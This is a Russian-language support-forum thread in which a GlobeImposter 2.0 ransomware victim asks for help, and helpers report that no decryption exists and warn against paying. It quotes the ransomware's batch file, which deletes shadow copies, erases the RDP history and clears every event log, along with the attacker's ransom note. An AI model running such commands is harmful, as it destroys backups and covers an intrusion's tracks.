globeimposter 2.0 Шифровальшик {travolta_john@aol.com}

31 октября, 2018

Здравствуйте

Зашифровали все рабочие данные.
с добавлением к имени "{travolta_john@aol.com}"
Во всех папках прилагался файл:

how_to_back_files.html

проверили с помошью

Выявлены следующие результаты:
https://ibb.co/gkS4L0

https://ibb.co/dEmBYL

bat файл содержил следующую информацию:

@echo off

vssadmin.exe Delete Shadows /All /Quiet

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

cd %userprofile%\documents\

attrib Default.rdp -s -h

del Default.rdp

for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

Логи в файле:
CollectionLog-2018.10.31-12.07.zip

Спасибо, очень ждем Вашей помощи.

how_to_back_files.html

CollectionLog-2018.10.31-12.07.zip

31 октября, 2018

Здравствуйте!

Автологер разве не предупредил вас, что запущен из терминальной сессии, а надо из консоли?

По возможности, переделайте.

+ пару зашифрованных документов в архиве прикрепите к следующему сообщению.

31 октября, 2018

К сожалению проделать выгрузку логов не из терминала, нет возможности.
Файлы для примера в Архиве "Примеры.rar".

Примеры.rar

31 октября, 2018

К сожалению, это GlobeImposter 2.0 и расшифровки нет.

31 октября, 2018

Переписка с злоумышленником:

1 ID = 0.5 BTC
For decrypt need pay 0.5 BTC
You can send me one file for test.
File only picture or text. No database, no backup.
Only we can decrypt your data.

31 октября, 2018

На ваш страх и риск. Известны случаи, когда после получения оплаты злодеи исчезали и ничего не высылали.

globeimposter 2.0 Шифровальшик {travolta_john@aol.com}

Рекомендуемые сообщения

Artem Parfenenko

Sandor

Artem Parfenenko

Sandor

Artem Parfenenko

Sandor

Пожалуйста, войдите, чтобы комментировать

Похожий контент

Обзор

Активность

Магазин

Kaspersky Support Forum